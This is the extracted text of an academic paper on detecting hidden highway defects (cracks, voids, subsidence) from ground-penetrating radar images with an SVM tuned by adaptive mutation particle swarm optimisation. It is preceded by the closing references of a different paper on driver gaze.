https://peerj.com http://dx.doi.org/10.1016/0262-8856(94)90039-6 http://dx.doi.org/10.1016/S0960-9822(01)00351-7 http://dx.doi.org/10.1109/TITS.2015.2493451 https://www.mathworks.com/products/statistics.html http://dx.doi.org/10.1016/j.trf.2016.09.015 http://dx.doi.org/10.1109/TPAMI.2008.106 https://www.nhtsa.gov/risky-driving/distracted-driving http://dx.doi.org/10.1109/MASSP.1986.1165381 http://dx.doi.org/10.3758/BF03195482 http://dx.doi.org/10.1016/j.ipm.2009.03.002 https://www.statisticbrain.com/car-crash-fatality-statistics-2016/ https://www.statisticbrain.com/car-crash-fatality-statistics-2016/ http://dx.doi.org/10.7717/peerj-cs.146 Available at http://pro.sagepub.com/lookup/doi/10.1177/1541931213571439 (accessed on 07 April 2014). Talamonti WJ, Kochhar D, Tijerina L. 2014. Eye glance and head turn correspondence during secondary task performance in simulator driving. In: Proceedings of the human factors and ergonomics society annual meeting, 2224–2228. Tawari A, Chen KH, Trivedi MM. 2014. Where is the driver looking: analysis of head, eye and iris for robust gaze zone estimation. In: Intelligent transportation systems (ITSC), 2014 IEEE 17th international conference on. Piscataway: IEEE, 988–994. Transportation Research Board. 2013. The 2nd strategic highway research program naturalistic driving study dataset. Available at https://insight.shrp2nds.us. Vicente F, Huang Z, Xiong X, De la Torre F, Zhang W, Levi D. 2015. Driver gaze tracking and eyes off the road detection system. IEEE Transactions on Intelligent Transportation Systems 16(4):2014–2027 DOI 10.1109/TITS.2015.2396031. Victor TW, Dozza M, Bärgman J, Boda C-N, Engström J, Flannagan C, Lee JD, Markkula G. 2015. Analysis of naturalistic driving study data: safer glances, driver inattention, and crash risk. No. SHRP 2 Report S2-S08A-RW-1. Transportation Research Board, Washington, D.C. Wang Y, Reimer B, Dobres J, Mehler B. 2014. The sensitivity of different methodologies for characterizing drivers’ gaze concentration under increased covnitive demand. Transportation Research Part F: Traffic Psychology and Behaviour 26:227–237 DOI 10.1016/j.trf.2014.08.003. Wierwille WW. 1993. Visual and manual demands of in-car controls and displays. In: Automotive ergonomics. London: Taylor and Francis, 299–320. Lee et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.146 19/19 https://peerj.com http://pro.sagepub.com/lookup/doi/10.1177/1541931213571439 https://insight.shrp2nds.us http://dx.doi.org/10.1109/TITS.2015.2396031 http://dx.doi.org/10.1016/j.trf.2014.08.003 http://dx.doi.org/10.7717/peerj-cs.146 work_4dzt4w64yvf3vioq3v655rj5mi ---- Submitted 8 December 2020 Accepted 7 February 2021 Published 30 March 2021 Corresponding author Xinyu Liu, lxy@ncwu.edu.cn Academic editor Pengcheng Liu Additional Information and Declarations can be found on page 15 DOI 10.7717/peerj-cs.417 Copyright 2021 Liu et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Non-destructive detection of highway hidden layer defects using a ground- penetrating radar and adaptive particle swarm support vector machine Xinyu Liu1,2,3, Peiwen Hao1, Aihui Wang4, Liangqi Zhang3, Bo Gu2 and Xinyan Lu2 1 CHANG’AN University, Xian, China 2 School of Electric Power, North China University of Water Resource and Electric Power, Zhengzhou, China 3 Henan Wanli Road & Bridge Group Co. Ltd., Xuchang, China 4 Zhongyuan University of Technology, Zhengzhou, China ABSTRACT In this paper, a method that uses a ground-penetrating radar (GPR) and the adaptive particle swarm support vector machine (SVM) method is proposed for detecting and recognizing hidden layer defects in highways. Three common road features, namely cracks, voids, and subsidence, were collected using ground-penetrating imaging. Image segmentation was performed on acquired images. Original features were extracted from thresholded binary images and were compressed using the kl algorithm. The SVM classification algorithm was used for condition classification. For parameter optimization of the SVM algorithm, the grid search method and particle swarm optimization algorithm were used. The recognition rate using the grid search method was 88.333%; the PSO approach often yielded local maxima, and the recognition rate was 86.667%; the improved adaptive PSO algorithm avoided local maxima and increased the recognition rate to 91.667%. Subjects Adaptive and Self-Organizing Systems, Artificial Intelligence, Computer Vision, Scientific Computing and Simulation Keywords 5 Ground penetrating radar (GPR), Image segmentation, Feature extraction, Support vector machine (SVM), Grid search method, Particle swarm optimization (PSO) INTRODUCTION Many forms of road deterioration can develop after prolonged utilization of expressways; examples include crack formation, development of voids, and subsidence (Marecos et al., 2017). The main cause of these conditions is the appearance of cracks under the roadbed, which gradually affects the road surface and causes surface cracks. Continued use of expressways causes incremental damage and can significantly increase the amount and type of maintenance work. With increasing traffic volumes in China, it is necessary to develop more efficient and automated road condition-detection methods. Much research has been conducted on using ground-penetrating radars (GPRs) for landform surveys. With the continuous development of the GPR technology and with the improvement of detection accuracy, the use of the GPR technology for non-destructive How to cite this article Liu X, Hao P, Wang A, Zhang L, Gu B, Lu X. 2021. Non-destructive detection of highway hidden layer defects us- ing a ground-penetrating radar and adaptive particle swarm support vector machine. PeerJ Comput. Sci. 7:e417 http://doi.org/10.7717/peerj- cs.417 https://peerj.com/computer-science mailto:lxy@ncwu.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.417 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.417 http://doi.org/10.7717/peerj-cs.417 detection of structural road conditions has been garnering increasing attention. Yuanlei et al. used the GPR technology to detect different physical anomalies, based on physical simulations and field tests, and the response characteristics across the two scenarios were consistent (Si & Wang, 2018). Shili et al. used the GPR technology to detect hidden defects, such as road breaks, voids, and subsidence, and acquired defect images (Guo, Xu & Li, 2018). Literature (Liang & Su, 2001) uses amplitude attenuation method in ultrasonic testing to evaluate the corrosion damage of reinforced structures in concrete roads. Document (Mandal, Tinjum & Edil, 2016) detects the defects in concrete road base by ultrasonic detection technology and establishes the mathematical model of sound wave propagation in different media. Literature (Wen et al., 2011) establishes the mathematical model of ultrasonic wave propagation in asphalt pavement and concrete pavement to identify highway surface defects, analyzes its feasibility and realizes ultrasonic nondestructive testing of road defects based on this. Using methods from the image recognition field, this study focuses on the design of shallow hidden defect classifiers based on the support vector machine (SVM) algorithm. The SVM method has been widely studied and applied in different contexts. Hou improved the SVM algorithm’s low precision around the hyperplane and reduced its computational complexity for processing large amounts of data; they also improved the algorithm’s training efficiency, and managed to reduce the number of false calls (Hou et al., 2018). El-Saadawi & Hatata (2017) used the SVM algorithm for the stator winding protection of synchronous generators, and achieved good results. The SVM algorithm has been widely used in a variety of context, such as big data, medical, agricultural, and transportation applications (Wang, Du & Wang, 2019; Wang et al., 2019; Zhang, Hu & Mao, 2008). Using the SVM algorithm, this study optimizes and improves its parameter selection process. By comparing the optimization performance of the grid search (GS) (Liu & Zhang, 2019) method and the particle swarm optimization (PSO) (Yang et al., 2018) algorithm, the superiority of the PSO algorithm is demonstrated, and the SVM classification algorithm for PSO-based parameter optimization is studied (Ma et al., 2018). By collecting radar images of three diseases on the 107 national highway section from Zhengzhou to Xinxiang in Henan Province, it is shown that the obtained method performs well in detecting hidden pavement defects. Image preprocessing and feature extraction Detection principle of the ground penetrating radar In the GPR approach, the ground is irradiated by high-frequency electromagnetic waves using a transmitting antenna, while the waves reflected from the ground are detected using a receiving antenna. Electromagnetic waves are reflected differently from different underground media; thus, different waveforms registered by the receiving computer for analysis (Benedetto et al., 2017). Figure 1 shows the GPR detection process. The reflection coefficient of an electromagnetic wave mainly depends on the dielectric constants of the medium in which the wave travels originally and the medium from which the wave is reflected, as given by Eqs. (1) and (2): Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.417 2/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.417 Figure 1 GPR detection process. Full-size DOI: 10.7717/peerjcs.417/fig-1 Figure 2 Image segmentation using the Canny operator. (A) Original image. (B) Gauss filter image. (C) Canny operator processing. Full-size DOI: 10.7717/peerjcs.417/fig-2 v = √ ε1− √ ε2 √ ε1+ √ ε2 (1) v = c √ ε1 (2) where, r is the reflection coefficient; ε1 ε2 are the relative dielectric constant of the incident medium and the medium from which the wave is reflected, v is the echo speed, and c is the speed of light in vacuum. Selection of the ground penetrating radar The ground penetrating radar used in this study is LTD-2100 ground penetrating radar system developed by China Electronics Technology Group Corporation. The main components of the system are 900 MHz shielded antenna, data acquisition host, computer, data cable, etc. Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.417 3/18 https://peerj.com https://doi.org/10.7717/peerjcs.417/fig-1 https://doi.org/10.7717/peerjcs.417/fig-2 http://dx.doi.org/10.7717/peerj-cs.417 Figure 3 Morphological processing of digital images. (A) Results obtained using the Canny operator. (B) Results obtained using morphological processing. Full-size DOI: 10.7717/peerjcs.417/fig-3 Image preprocessing The original images of roads detected by a GPR include the reflection characteristics of road conditions and various types of clutter caused by environmental factors. The clutter distribution is typically non-uniform, affecting the correct recognition and classification of road conditions. To improve the accuracy of the road condition determination, it is necessary to remove the effect of this clutter (Bu, 2017). To extract the features associated with various road conditions, the acquired images should be segmented. Image filtering. The objective of image filtering is to minimize the effects of noise and interference in raw images. The noise and interference are mainly attributed to the processes –image acquisition and image transmission. Gaussian filtering is typically used for image denoising, which can remove unnecessary interference and protect the edge of the image. Image segmentation. The objectives of image segmentation are to classify foreground and background pixels, and to determine the organization of foreground pixels (i.e., detect foreground objects) (Fengjun et al., 2018). The Canny operator has been widely used for image segmentation of radar images, and its segmentation performance after Gaussian filtering is demonstrated in Fig. 2. Figure 2A is the original radar acquisition diagram. Figure 2B is the result after Gaussian transformation. It can be seen that the clutter in the original image is removed. Figure 2C is the disease characteristic waveform diagram extracted after Canny operator. To retain only the necessary information, the image was subjected to the morphological operations of Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.417 4/18 https://peerj.com https://doi.org/10.7717/peerjcs.417/fig-3 http://dx.doi.org/10.7717/peerj-cs.417 Figure 4 Projection segmentation results. Full-size DOI: 10.7717/peerjcs.417/fig-4 expansion and corrosion; the results are shown in Fig. 3. Figure 3A is the image after Canny operator segmented the disease waveform. Figure 3B is an enhanced disease waveform diagram after the segmented waveform is processed by digital morphology, so as to facilitate the extraction of disease features in the following text. The processed image was segmented and objects were extracted using the vertical projection method, as shown in Fig. 4. Feature extraction. Feature extraction should satisfy the following requirements: (1) features should have strong anti-interference ability; (2) features should be insensitive to translation, rotation, and scale transformation of images; (3) features should be insensitive Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.417 5/18 https://peerj.com https://doi.org/10.7717/peerjcs.417/fig-4 http://dx.doi.org/10.7717/peerj-cs.417 Table 1 Gray level co-occurrence matrix characteristics of cracks, voids, and subsidence. Defect type crack GLCM 0◦ 45◦ 60◦ 90◦ contrast 1.333 2.149 1.436 2.194 correlation 0.895 0.826 0.893 0.826 energy 0.724 0.708 0.728 0.702 homogeneity 0.988 0.962 0.972 0.967 Defect type void GLCM 0◦ 45◦ 60◦ 90◦ contrast 0.998 1.501 1.273 1.806 correlation 0.473 0.235 0.335 0.075 energy 0.644 0.594 0.626 0.579 homogeneity 0.891 0.865 0.886 0.849 Defect type subsidence GLCM 0◦ 45◦ 60◦ 90◦ contra 3.813 6.486 5.447 5.924 correlation 0.414 0.019 0.164 0.104 energy 0.795 0.750 0.768 0.758 homogeneity 0.931 0.884 0.902 0.838 Table 2 Differential statistical matrix characteristics of cracks, voids, and subsidence. GLDS mean contrast asm ent crack 0.048 289.831 0.916 0.261 void 0.141 660.909 0.589 2.186 subsidence 0.121 765.796 0.794 0.5202 to geometric distortions; (4) distance between similar images should be as small as possible; and (5) distance between different images should be as large as possible. The algorithm for extracting feature vectors should be simple, and the dimensionality of the feature space should not be too high for ensuring the classification performance of the system (Xiao & Liu, 2017). To satisfy the above requirements, the following features were used: area, image complexity, image texture, and seven rectangular features. In this study, three types of road hazards are studied, namely, road cracking, hollowing, and subsidence. Through simulation and actual images, combined with the classification of expert experience, three types of samples are collected to describe these conditions. Twentynine feature vectors were extracted for each sample, and the obtained set of features is shown in Tables 1, 2 and 3. The dimensions of the different features are very different. Direct use of feature data not only reduces the system performance, but also affects the classification accuracy. To avoid this shortcoming, it is necessary to perform data normalization (Chowdhury et al., 2019). Let the eigenvector of a pattern vector be X =(x1,x2,...,xm). Then the normalized Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.417 6/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.417 Table 3 Seventh order invariant moment feature. seven-order Hu moment crack void subsidence 81 5.076 4.059 4.463 82 10.591 8.547 9.925 83 22.646 15.286 19.998 84 22.974 15.286 22.229 85 45.786 30.563 19.562 86 28.343 19.562 28.508 87 43.134 35.275 38.163 eigenvector x′i is x′ij =0.1+ 0.8(xij−xi,min) xi,max−xi,min (i=1,2,...,m) (3) where, xi,max,xi,min are the maximum and minimum of {xi(k)|k−1,...,P}, and P is the overall number of samples in the training set. Feature selection. In this study, K −L transformation was used as the feature selection algorithm (Jun, 2016). K −L transformation can take into account different classification information and realize supervised feature extraction. Under the criterion of minimum mean square error, it can obtain an orthogonal transformation matrix A that can map the original feature X ′ from high-dimensional space D to low-dimensional space vector y′. K−L transformation can retain the data component with the largest variance in the original data and highlight the data difference. Empirical knowledge was used for removing several highly correlated features, and K−L changes were used for reducing the dimensionality of the original feature space. A relatively simple class-center classifier was used for identifying the samples after the K−L dimensionality reduction transformation. The recognition rate is shown in Fig. 5 for the test set. According to Fig. 5, when the dimensionality of the feature space reaches 12, the recognition rate saturates; thus, the optimal dimensionality of the feature space is 12. K−L transformation can take into account different classification information, realize supervised extraction of features with too high correlation, and then use K−L transformation to extract data information from them, thus achieving the purpose of compressing dimensions and improving recognition rate. The SVM classifier design Basic principle of the SVM SVM is a binary classification algorithm that is trained using the supervised learning paradigm. The algorithm attempts to determine an optimal classification hyperplane, whereby the edge distance between two sample classes and the dividing hyperplane (decision boundary) is maximized. The larger the edge distance is, the more separated the two sample classes are, the stronger the classification robustness, and the better the Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.417 7/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.417 Figure 5 Dependence of the recognition rate on the number of features. Full-size DOI: 10.7717/peerjcs.417/fig-5 method’s generalizability (Liu et al., 2018). The hyperplane equation is ω T x+b=0 (4) whereω is the normal to the hyperplane, and x determines the angle with the hyperplane; b is the distance between the hyperplane and the origin. The hyperplane is denoted as (ω,b); then, the distance from a certain point (sample) to the hyperplane (ω,b) is denoted by r: r = ∣∣ωT x+b∣∣ ‖ω‖ (5) Let the support vector be 1 and point away from the hyperplane, so that ∣∣ωT x+b∣∣=1, and let the vectors in the two different classes be γ and point away from the hyperplane: γ = 2 ||ω|| (6) For optimal segmentation, we need to find the hyperplane with the largest interval; that is, we need to find the parameters ω and b that maximize γ . According to Eq. (6), only ‖ω‖−1 should be maximized. Optimization of the SVM classifier parameters We used MATLAB (Mathworks, Inc.) to validate the diagnostic accuracy of the SVM- based classifier with respect to the road conditions. We obtained a dataset comprising 100 Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.417 8/18 https://peerj.com https://doi.org/10.7717/peerjcs.417/fig-5 http://dx.doi.org/10.7717/peerj-cs.417 Figure 6 Parameter optimization results of the grid search method. Full-size DOI: 10.7717/peerjcs.417/fig-6 examples of road cracking, hollowing, and subsidence conditions; 80% of these images were used for training the method, while the remaining 20% were used for testing the classifier. The performance of any SVM classifier depends on the penalty factor and kernel function parameters. The optimal parameter values are typically determined using the grid search approach, which exhausts the set of possible parameter combinations to determine the optimal combination. The penalty term c and the kernal function parameters g were considered to grow exponentially in the [2−14,214] range; at the same time, the step between each cell on the grid was set to 0.5, that is, the growth time-points were 2−14,2−13.5,...,214. As shown in Fig. 6, the best classification performance was obtained for log2(c)=7.60, best log2(g) =−6.60. As shown in the retrieval results above, the accuracy of log2(c) between [2 5,210] and log2(g) between [2 −10,2−4] was relatively good; thus, the step was set to 0.2 in this range, and the parameters were further optimized. The results are shown in Fig. 7. According to Fig. 7, the best classification was obtained for best=7 and best=−5.2. These optimal values were used as the SVM classifier parameters for validating its classification performance; then, the accuracy of the classifier with these parameters was characterized. The validation results are shown in Fig. 8, and the final validation accuracy rate was 88.333%, the image recognition time is t =0.630 s. Adaptive mutation particle swarm The results obtained using the grid search approach can meet the desired detection requirements, but because the grid search approach only considers discrete combinations of parameters, the optimal solution can be easily missed. At the same time, the grid search Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.417 9/18 https://peerj.com https://doi.org/10.7717/peerjcs.417/fig-6 http://dx.doi.org/10.7717/peerj-cs.417 Figure 7 Results obtained after refining the step size. Full-size DOI: 10.7717/peerjcs.417/fig-7 Figure 8 Test-set classification results after the grid search optimization of the SVM classifier parame- ters. Full-size DOI: 10.7717/peerjcs.417/fig-8 Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.417 10/18 https://peerj.com https://doi.org/10.7717/peerjcs.417/fig-7 https://doi.org/10.7717/peerjcs.417/fig-8 http://dx.doi.org/10.7717/peerj-cs.417 method is exhaustive, and needs to consider all the possible cases; thus, this optimization approach is time-consuming. To improve the accuracy and reduce the computation time, the PSO algorithm is proposed in this section. The PSO approach. PSO simulates a flock of birds, which are modeled as massless particles (Hsieh et al., 2018). Each particle has only two attributes: velocity v and position x. Velocity represents the speed of movement, and position represents the direction of movement. Each particle searches for the optimal solution separately in the search space, and records it as the current individual extreme value P; the individual extreme values are shared among all the particles in the entire swarm, and the optimal individual extreme value is determined as the current global optimal solution G of the entire swarm of particles. All of the particles in the particle swarm adjust their speeds and positions according to the current individual extremum P found by themselves and the current global optimal solution G shared by the entire particle swarm. The underlying PSO process is relatively simple, and can be divided into the following steps: (1) initializing the particle swarm; (2) evaluating the particles, that is, calculating the fitness values; (3) searching for individual extrema P; (4) searching for the global optimal solution G; (5) modifying the particles’ speeds and positions (Yang, Wang et al., 2019). The update equations are: vk+1id =ωv k id+c1 ·rand(0,1)·(p k id−x k id) +c2 ·rand(0,1)·(p k gd−x k id) xk+1id =x k id+v k+1 id (7) Where ω is the inertia factor, c1 and c2 are the acceleration constants, and rand (0,1) are random numbers in the interval (0,1). pid denotes d the dimension of the individual extreme value of variable i.pgd represents the dimensionality d of the global optimal solution. k represents the current number of iterations. The PSO approach. The following parameter values were used: c1 =2,c2 =2, population size = 20, maximal number of iterations = 200, and cross-validation fold K = 5. The fitness curve for the optimized SVM classifier parameters is shown in Fig. 9. After iteration 15, the fitness reached its optimal value. At this point, the classifier accuracy was 89.197%, the best c was 0.7596, and the best g was 0.7674. Although the basic PSO algorithm exhibits a good convergence speed and good optimization performance, it can prematurely converge onto a locally optimal solution; as a result, the population will easily stagnate without external pressure. Variation improvement. To deal with the premature convergence problem, we utilized the concept of mutations that is often used in genetic algorithms, and incorporated mutations into the PSO framework. For that, we defined a trigger to allow particles to escape locally optimal solutions, thus ensuring a global search (Tong et al., 2018). The population fitness varianceσ2 was used for determining whether a local maximum was reached in the iteration process. The population fitness variance σ2 was defined as follows: σ 2 = N∑ i=1 ( fi−favg f )2 (8) Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.417 11/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.417 Figure 9 Fitness curve obtained after the PSO. Full-size DOI: 10.7717/peerjcs.417/fig-9 In the above equation, N is the number of particles, f is the normalized calibration factor, fi is the fitness of the first particle, and favg is the average fitness. It can be seen that the larger the value of σ2, the more divergent the particle swarm; conversely, the smaller the population fitness variance, the more convergent the particle swarm is. Values of σ2 close to zero indicate that the particle swarm is approaching the globally optimal solution or is converging onto a locally optimal solution. To avoid premature trapping of the particle swarm in local optima, the swarm is subjected to mutations: xi(k+1)=C ·rand(0,1)·xi(k) (9) In the above equation, C is a normally distributed random number in the [0,1] interval and is the variation factor; rand(0,1) is a random number in the [0,1] range; k is the number of iterations. Mutations alter the particles’ positions and thus allow to escape local optima (Deng et al., 2019). The fitness curve of the improved adaptive mutation PSO algorithm for SVM-based parameter optimization is shown in Fig. 10. Evidently, the best fitness converges to a local maximum after 17 generations. Mutations allow the particle swarm to escape this local maximum after 97 generations; after that, optimization parameters are determined with higher accuracy. The finally estimated parameter values are: c =7.751, g =5.754. The fitness at this global optimum is 91.698%. Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.417 12/18 https://peerj.com https://doi.org/10.7717/peerjcs.417/fig-9 http://dx.doi.org/10.7717/peerj-cs.417 Figure 10 Fitness curve obtained after the variant PSO. Full-size DOI: 10.7717/peerjcs.417/fig-10 Simulation results. Based on the results in the previous section, the SVM model was constructed using the following parameter values: c =0.7596 and g =0.7674, which were determined using the PSO method. The results are shown in Fig. 11. For these parameter values, the accuracy of the model was 86.667%, the image recognition time is t =0.590s; however, the recognition accuracy had not improved. The main explanation was the trapping of the particle swarm in a local optimum during the process of parameter optimization. An SVM classifier was then constructed and validated using c =7.751 and g =5.754; these parameter values were determined using the adaptive mutation PSO algorithm. The validation results are shown in Fig. 12. From Fig. 12, the classification accuracy of the SVM classification model with the parameter values determined by the adaptive mutation PSO was 91.667%, the image recognition time is t =0.615s. This classification accuracy is significantly higher compared with that achieved by the SVM method that uses parameters optimized by the grid search approach. CONCLUSIONS According to the requirements of automatic recognition of highway hidden layer conditions, this paper proposes an automatic detection and recognition method that Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.417 13/18 https://peerj.com https://doi.org/10.7717/peerjcs.417/fig-10 http://dx.doi.org/10.7717/peerj-cs.417 Figure 11 Validation results of the SVM model, for conventional PSO. Full-size DOI: 10.7717/peerjcs.417/fig-11 uses an SVM with parameters optimized using the adaptive mutation PSO approach. In this method, PSO with mutations is used for parameter optimization. In this study, three different methods were used for parameter optimization: (1) the grid search method, (2) the PSO approach, and (3) the adaptive mutation PSO. MATLAB and Python were used for implementing these optimization methods, and the optimization processes and their results were validated. Compared with the grid search method and the simple PSO approach, the accuracy of the SVM with parameters optimized using mutation PSO was higher, translating into better performance on automatic identification of highway conditions. Our simulation results showed that the classification accuracy of the SVM classifier with the grid search method was 88.333%, the classification accuracy of the SVM classifier with PSO was 86.667%, and the classification accuracy of the SVM classifier with mutation PSO was 91.667%. Thus, the effect of SVM classifier with mutation PSO is obviously better than that of the other two. Compared with the grid search method, the classification accuracy was improved. However, owing to the pre-processing of images and processing of feature-related data, some defect-related information is likely to become distorted, which can affect the accuracy of recognition. If a zero-distortion image processing method can be found, the recognition accuracy will be greatly improved. At present, only cracks, voids and subsidence can be analyzed and studied, while asphalt pavement diseases and defects can be divided into 11 categories and 21 items. In order to better improve Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.417 14/18 https://peerj.com https://doi.org/10.7717/peerjcs.417/fig-11 http://dx.doi.org/10.7717/peerj-cs.417 Figure 12 Validation results of the SVM model, for variant PSO. Full-size DOI: 10.7717/peerjcs.417/fig-12 the scope of the identification system, further research should be done on other types of defects. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the Key Scientific Research Projects of Higher Education Institutions in Henan Province (No.21A120006) and Henan Key Youth Teacher Research Project (2016GGJS-074). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Scientific Research Projects of Higher Education Institutions in Henan Province: 21A120006. Henan Key Youth Teacher Research Project: 2016GGJS-074. Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.417 15/18 https://peerj.com https://doi.org/10.7717/peerjcs.417/fig-12 http://dx.doi.org/10.7717/peerj-cs.417 Competing Interests Liangqi Zhang is a postdoctoral supervisor in the postdoctoral workstation of Wanli Rord & Bridge Group Co. Ltd. Xinyu Liu is engaged in related research at this postdoctoral workstation. Liangqi Zhang is Xinyu Liu’s second mentor when he is a postdoctoral fellow. Author Contributions • Xinyu Liu conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. • Peiwen Hao and Liangqi Zhang performed the experiments, prepared figures and/or tables, and approved the final draft. • Aihui Wang performed the computation work, prepared figures and/or tables, and approved the final draft. • Liangqi Zhang performed the experiments, prepared figures and/or tables, and approved the final draft. • Bo Gu and Xinyan Lu analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Raw data and code are available in the Supplementary Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.417#supplemental-information. REFERENCES Benedetto A, Tosti F, Bianchini Ciampoli LB, D’Amico F. 2017. An overview of ground- penetrating radar signal processing techniques for road inspections. Signal Processing 132:201–209 DOI 10.1016/j.sigpro.2016.05.016. Bu F. 2017. A high-order clustering algorithm based on dropout deep learning for heterogeneous data in cyber-physical-social systems. IEEE Access 6:11687–11693. Chowdhury SA, Stepanov EA, Danieli M, Riccardi G. 2019. Automatic classification of speech overlaps: feature representation and algorithms. Computer Speech and Language 55:145–167 DOI 10.1016/j.csl.2018.12.001. Deng W, Yao R, Zhao H. 2019. A novel intelligent diagnosis method using optimal LS-SVM with improved PSO algorithm. Soft Computing 23(7):2445–2462 DOI 10.1007/s00500-017-2940-9. El-Saadawi M, Hatata A. 2017. A novel protection scheme for synchronous generator stator windings based on SVM. Protection and Control of Modern Power Systems 2(1):1–12. Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.417 16/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.417#supplemental-information http://dx.doi.org/10.7717/peerj-cs.417#supplemental-information http://dx.doi.org/10.7717/peerj-cs.417#supplemental-information http://dx.doi.org/10.1016/j.sigpro.2016.05.016 http://dx.doi.org/10.1016/j.csl.2018.12.001 http://dx.doi.org/10.1007/s00500-017-2940-9 http://dx.doi.org/10.7717/peerj-cs.417 Fengjun C, Chenghan W, Mengmeng GU, YANDong Z. 2018. Spruce image segmen- tation algorithm based on fully convolutional networks. Transactions of the Chinese Society for Agricultural Machinery 49(12):188–194. Guo SL, Xu L, Li X-Z. 2018. Application of GPR in detection of road surface settlement. Progress in Geophysics 33(03):1213–1217 DOI 10.6038/pg2018BB0341. Hou K, Shao G, Wang H. 2018. Research on practical power system stability analysis algorithm based on modified SVM. Protection and Control of Modern Power Systems 3(1):1–7 DOI 10.1186/s41601-017-0075-8. Hsieh YZ, Su MC, Chen JH. 2018. Developing a PSO-based projection algorithm for a porosity detection system using X-ray CT images of permeable concrete. IEEE Access 6:64406–64415 DOI 10.1109/ACCESS.2018.2877157. Jun N. 2016. A data reduction algorithm based on K-L feature compression for cloud computing. Microelectronics and Computer 33(02):125–129. Liang M-T, Su P-J. 2001. Detection of the corrosion damage of rebar in concrete using impact-echo method. Cement and Concrete Research 31:1427–1436 DOI 10.1016/S0008-8846(01)00569-5. Liu Y, Li X, Li S, Zhu X. 2018. Imbalanced dataset classification algorithm based on improved support vector machine. Journal of Shihezi University (Natural Science) 36(05):637–643. Liu X, Zhang Z. 2019. Parameter optimization of Support Vector Machine based on improved grid search method. Journal of Jiangxi University of Science and Technology 40(01):5–9. Ma Z, Dong Y, Liu H, Shao X, Wang C. 2018. Method of forecasting non-equal interval track irregularity based on improved grey model and PSO-SVM. IEEE Access 06:34812–34818 DOI 10.1109/ACCESS.2018.2841411. Mandal T, Tinjum JM, Edil TB. 2016. Non-destructive testing of cementitiously stabilized materials using ultrasonic pulse velocity test. Transportation Geotechnics 6:97–107 DOI 10.1016/j.trgeo.2015.09.003. Marecos V, Solla M, Fontul S, Antunes V. 2017. Assessing the pavement subgrade by combining different non-destructive methods. Construction and Building Materials 135:76–85 DOI 10.1016/j.conbuildmat.2017.01.003. Si Y, Wang GL. 2018. Study on the response characteristics of different physical anoma- lies in the detection of ground-penetrating radar. Journal of Yunnan University (Natural Sciences Edition) 40(05):903–908. Tong Y, Zhong M, Li J, Li D, Wang Y. 2018. Research on intelligent welding robot path optimization based on GA and PSO algorithms. IEEE Access 6:65397–65404 DOI 10.1109/ACCESS.2018.2878615. Wang W, Du X, Wang N. 2019. Building a cloud IDS using an efficient feature selection method and SVM. IEEE Access 7:1345–1354 DOI 10.1109/ACCESS.2018.2883142. Wang C, Zhang Y, Song J. 2019. A novel optimized SVM algorithm based on PSO with saturation and mixed time-delays for classification of oil pipeline leak detection. Sys- tems Science and Control Engineering 7(1):75–88 DOI 10.1080/21642583.2019.1573386. Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.417 17/18 https://peerj.com http://dx.doi.org/10.6038/pg2018BB0341 http://dx.doi.org/10.1186/s41601-017-0075-8 http://dx.doi.org/10.1109/ACCESS.2018.2877157 http://dx.doi.org/10.1016/S0008-8846(01)00569-5 http://dx.doi.org/10.1109/ACCESS.2018.2841411 http://dx.doi.org/10.1016/j.trgeo.2015.09.003 http://dx.doi.org/10.1016/j.conbuildmat.2017.01.003 http://dx.doi.org/10.1109/ACCESS.2018.2878615 http://dx.doi.org/10.1109/ACCESS.2018.2883142 http://dx.doi.org/10.1080/21642583.2019.1573386 http://dx.doi.org/10.7717/peerj-cs.417 Wen MB, Edil T, Tinjum J, Gokce A, Wang J. 2011. Characterization of cementitiously stabilized layers for use in pavement design and analysis. Project 04–36 Test Procedure Evaluation Report National Cooperative Highway Research Program, Washington, D.C., USA. Xiao Z, Liu H. 2017. Adaptive features fusion and fast recognition of potato typical disease images. Transactions of the Chinese Society for Agricultural Machinery 48(12):26–32. Yang J, Wang X. 2019. Extended PSO based collaborative searching for robotic swarms with practical constraints. IEEE Access 7:76328–76341 DOI 10.1109/ACCESS.2019.2921621. Yang L, Zhichuan Z, Alin H. 2018. Pulmonary nodule recognition based on multiple kernel learning support vector machine-PSO. Computational and Mathematical Methods in Medicine 2018:1–10. Zhang H, Hu YX, Mao HP. 2008. Image recognition and classification of the stored- grain pests based on support vector machine. Journal of Agricultural Mechanization Research 08:36–38. Liu et al. (2021), PeerJ Comput. 